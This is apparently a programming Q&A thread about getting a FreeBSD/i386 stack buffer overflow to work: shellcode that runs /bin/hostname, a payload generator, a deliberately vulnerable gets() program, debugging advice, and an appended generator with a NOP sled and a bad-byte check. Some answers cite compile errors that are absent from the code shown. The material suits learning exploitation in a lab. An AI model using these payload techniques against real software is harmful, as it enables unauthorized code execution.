Buffer Overflow - Not getting the correct output
The shellcode prints the hostname (bin/hostname), but when I execute the code it shows me the path in reverse order and does not print the HOSTNAME. I am actually doing the buffer overflow. I am using a FreeBSD Intel machine. This is my code.
Can you figure out please where the error is?
//Prog 1: builds the payload (shellcode + filler + return address) and writes it to stdout
#include <stdio.h>
#include <string.h>

int main(void)
{
    /* FreeBSD/i386 execve("////bin/hostname") shellcode, 33 bytes, no NUL or newline bytes */
    char shellcode[] = "\x31\xc0\x50\x68\x6e\x61\x6d\x65\x68\x68\x6f\x73\x74\x68\x62"
                       "\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x54\x53\xb0\x3b"
                       "\x50\xcd\x80";
    int i;
    char buf[108];
    i = strlen(shellcode);
    fprintf(stderr, "%d\n", i);   /* diagnostic on stderr so it does not land in the payload */
    strcpy(buf, shellcode);
    /* filler from the end of the shellcode up to the saved return address;
       starting right after the shellcode also overwrites the NUL that strcpy() left,
       which would otherwise cut the payload short */
    for (i = strlen(shellcode); i < 104; i++)
    {
        buf[i] = 'b';
    }
    /* return address 0xbfbffa2c, little-endian, at buf+100 (buffer) + 4 (saved EBP) */
    buf[104] = '\x2c';
    buf[105] = '\xfa';
    buf[106] = '\xbf';
    buf[107] = '\xbf';
    /* buf has no terminator, so write all 108 bytes instead of printf("%s") */
    fwrite(buf, 1, sizeof buf, stdout);
    return 0;
}
The above program's output is injected into the program below ...... so it creates the buffer overflow and prints the hostname.
#include <stdio.h>

int
main (int argc, char **argv){
    char buf[100];
    printf("Please Enter your Name");
    fflush(stdout);
    gets(buf);                  /* no bounds check: this is the deliberate overflow */
    printf("Hello %s \n",buf);
    return 0;
}

void notcalled(void){
    //puts("cccc");
}
- you are defining int I; and using i
- the for is using a :i++, instead of a ;i++
- strncpy() is missing the size_t param too
There is no buffer overflow in this sample code. You are simply printing the shellcode, instead of executing it.
The code as posted doesn't even compile, due to things like quotes, the i vs I problem, : instead of ; and strncpy needing 3 arguments (possibly more errors).
The shellcode may be correct for FreeBSD, I can't check that. It definitely isn't correct for Linux, though.
Apparently you are still not triggering code execution, even though now I see where you have your buffer overflow. Note however that overflowing the buf variable is trying to overwrite the return address of main, so it should print the text in any case. Also, the compiler may have generated a different stack layout than what you expect, or maybe your stack is not executable (although you should get a segfault in that case).
Use a debugger to single-step through the code, beginning with the "return" statement in main, and see what is happening. You will soon reach a RET instruction which should pop the starting address of your shellcode into the instruction pointer, effectively jumping to it. I suspect that is not happening for some reason.
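The answer above points at the two things that usually go wrong here: the guessed return address does not match the compiler's actual stack layout, and the payload is mangled on the way in. The following is an added example, not code from the question or from either answer. It builds the same kind of payload as the question's Prog 1 but puts a NOP sled in front of the shellcode, so the return address only has to land somewhere in the sled rather than exactly at the start of buf, and it checks for bytes that gets() ('\n') or a strcpy()-style copy ('\0') would truncate before writing the raw bytes with fwrite(). The buffer size (100), the return-address offset (104) and the address 0xbfbffa2c are taken from the question and are assumptions about the target's frame, not measured values; verify them in a debugger as the answer suggests.

```c
/* Added example: payload generator with NOP sled and bad-byte check.
 * Not the question's own code. Offsets and address are assumed from the
 * question, not measured on a real target. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* FreeBSD/i386 execve("////bin/hostname") shellcode from the question (33 bytes). */
static const unsigned char shellcode[] =
    "\x31\xc0\x50\x68\x6e\x61\x6d\x65\x68\x68\x6f\x73\x74\x68\x62"
    "\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x54\x53\xb0\x3b"
    "\x50\xcd\x80";
#define SHELLCODE_LEN (sizeof shellcode - 1)

/* Assumed frame: 100 bytes of buf, then 4 bytes of saved EBP, then the
 * saved return address at offset 104. */
#define RET_OFFSET 104
#define RET_ADDR   0xbfbffa2cU   /* guessed stack address from the question */

/* Index of the first byte that would cut the input short on delivery:
 * '\n' ends the line for gets(), '\0' ends a strcpy()-style copy.
 * Returns -1 if the payload is clean. */
long find_bad_byte(const unsigned char *p, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (p[i] == '\0' || p[i] == '\n')
            return (long)i;
    return -1;
}

/* Lay out [NOP sled][shellcode][ret] in out.  Returns the total length
 * (ret_off + 4), or 0 if the shellcode does not fit before ret_off or
 * out is too small. */
size_t build_payload(const unsigned char *sc, size_t sc_len,
                     size_t ret_off, uint32_t ret_addr,
                     unsigned char *out, size_t out_cap)
{
    size_t total = ret_off + 4;
    if (sc_len > ret_off || total > out_cap)
        return 0;
    size_t sled = ret_off - sc_len;
    memset(out, 0x90, sled);                 /* NOP sled: any landing point here slides into the shellcode */
    memcpy(out + sled, sc, sc_len);          /* shellcode sits right before the saved return address */
    /* i386 is little-endian, so the address goes in low byte first */
    out[ret_off + 0] = (unsigned char)(ret_addr & 0xff);
    out[ret_off + 1] = (unsigned char)((ret_addr >> 8) & 0xff);
    out[ret_off + 2] = (unsigned char)((ret_addr >> 16) & 0xff);
    out[ret_off + 3] = (unsigned char)((ret_addr >> 24) & 0xff);
    return total;
}

int main(void)
{
    unsigned char payload[256];
    size_t n = build_payload(shellcode, SHELLCODE_LEN, RET_OFFSET, RET_ADDR,
                             payload, sizeof payload);
    if (n == 0) {
        fprintf(stderr, "shellcode does not fit before the return address\n");
        return 1;
    }
    long bad = find_bad_byte(payload, n);
    if (bad >= 0) {
        fprintf(stderr, "byte at offset %ld would truncate the input\n", bad);
        return 1;
    }
    /* Diagnostics go to stderr so they never mix with the payload on stdout. */
    fprintf(stderr, "payload: %zu bytes, sled %zu, ret at %d\n",
            n, (size_t)(RET_OFFSET - SHELLCODE_LEN), RET_OFFSET);
    fwrite(payload, 1, n, stdout);           /* raw bytes; no printf("%s") terminator problem */
    return 0;
}
```

Pipe the generator into the vulnerable program (`./gen | ./vuln`); gets() reads the whole 108 bytes because none of them is a newline. If the debugger shows the overwritten return address landing anywhere in the 71-byte sled, the shellcode runs, which is the point of the sled when the exact address of buf is only a guess.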